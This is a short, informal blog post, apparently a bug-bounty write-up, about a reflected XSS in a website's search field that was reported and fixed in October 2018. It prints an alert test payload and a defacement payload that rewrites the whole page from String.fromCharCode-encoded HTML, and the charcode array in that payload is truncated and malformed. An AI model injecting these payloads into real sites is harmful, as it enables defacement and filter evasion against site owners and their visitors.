XSS WITH HTML AND HOW TO CONVERT THE HTML INTO CHARCODE()
Hello, Back Again With Me
This time i want to try to do some inject XSS with HTML full page script. It can be called with “injecting xss then it will shows your HTML Page”
As usual, i do some check with this command input :
<script>alert(‘test’)</script>
If vuln, i try something different
My Target :
2nd Open this Page :
Third, i try to convert my deface HTML web lol
do COPY all of my HTML script.
Then open uncle jim’s page
Paste into that part (zoom if you can’t see) :
Then click the charcodeat() button
After got the char result, i do Copy the charcode on my notepad
Then i do add some script :
<script>document.documentElement.innerHTML=(String.fromCharCode(*paste here your charcode*));<script>
It will looks this
<script> document.documentElement.innerHTML=(String.fromCharCode(60, 104, 116, 109, 108, 62, 32, 10, 60, 104, 101, 97, 100, 62, 32, 10, 60, 115, 99, 114, 105, 112, 116, 62, 32, 118, 97, 114, 32, 109, 101, 115, 115, 97, 103, 101, 61, 34, 84, 73, 77, 73, 84, 83, 69, 67, 45, 78, 88, 71, 71, 34, 59, 10, 47, 47, dst));</script>
Then back to your target page, paste into search column then do ENTER
TADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …..
That;s it
Thank you
timeline
- 20/10/2018 (Submit Report)
- 21/10/2018 (Mitigation Bug)
- 22/10/2018 (Bug Closed)